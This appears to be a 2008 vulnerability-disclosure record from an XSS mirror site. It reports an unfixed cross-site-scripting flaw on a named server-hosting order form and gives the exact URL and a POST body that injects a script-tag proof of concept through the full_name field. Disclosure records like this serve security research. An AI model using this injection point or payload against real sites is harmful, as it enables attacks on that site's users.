Security researcher Uber0n, has submitted on 15/05/2008 a cross-site-scripting (XSS) vulnerability affecting secure.instantventrilo.com, which at the time of submission ranked 151968 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 09/07/2008. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 15/05/2008 |
Date published: 09/07/2008 |
Fixed? Mail us! | Status: UNFIXED |
Author: Uber0n |
Domain: secure.instantventrilo.com |
Category: XSS |
Pagerank: 151968 |
URL: https://secure.instantventrilo.com/order-ventrilo-server-hosting.php?a=submit |
POST: uname=&full_name=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E&phone=wawa&email1=wawa&email2=wawa& password=&password2=&address=wawa&city=wawa&state=wawa&zip=&country=US&slots_price=24.50&slots=70&vo ice_hosting=&months=12&d_1=0&d_3=5&d_6=15&d_12=37&location=20&quality=Premium+Sound+Quality+-+Window s%2FMacintosh+-+FREE&os=Instant+Setup+-+Ready+when+you+order.+-+FREE&CUSTOM_HOSTNAME=NO&x_=%24&total _amount=185.22&xd=USD&agree=on&submit=Submit+%26+Continue |
Click here to view the mirror
|
|
|